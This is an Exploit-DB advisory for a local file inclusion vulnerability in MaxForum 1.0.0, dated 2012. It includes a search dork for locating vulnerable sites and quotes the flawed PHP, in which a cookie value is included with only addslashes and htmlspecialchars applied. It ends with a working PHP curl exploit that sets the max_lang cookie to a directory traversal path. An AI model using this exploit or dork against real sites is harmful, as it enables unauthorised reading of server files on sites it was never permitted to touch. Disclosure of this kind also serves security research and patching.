MaxForum 1.0.0 - Local File Inclusion

Author: ahwak2000
type: webapps
platform: php
port: 
date_added: 2012-08-15 
date_updated: 2012-08-15 
verified: 1 
codes: OSVDB-85459 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-15-at-105234-am.png 
application_url: http://www.exploit-db.comMax_v1.0.0.zip

+---------------------------------------+
| MaxForum v1.0.0 Local File Inclusion  |
+---------------------------------------+
Author.............: ahwak2000
Mail...............: z.u5[at]hotmail[dot]com
Software link......: http://www.max4dev.com/
Tested versions....: 1.0
Dork...............: Powered by MaxForum v1.0.0
Date...............: 15/08/2012
---------------------------------------------------------------
in file /MaxForum/includes/forums/warn_popup.php

line 100 			if (isset($_COOKIE['max_lang']) && (!isset($_COOKIE['max_name']))){
line 101			$board_lang = escape_string($_COOKIE['max_lang']);
line 102		}
line 103
line 104 	@include "../../language/$board_lang";
line 105 	@include "../../language/$board_lang.php";


-------------
in file /MaxForum/libs/php/functions.php

		function escape_string($string) {

			$string = addslashes($string);

			$string = htmlspecialchars($string);
	   		return $string;
		}
----------------------------------------------------------------
exploit:

<?
$url="http://site.com/MaxForum/";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url."/includes/forums/warn_popup.php");
curl_setopt($ch, CURLOPT_COOKIE, "max_lang=../gpl.txt");  // <--- edit
 $buffer = curl_exec($ch);
?>

#end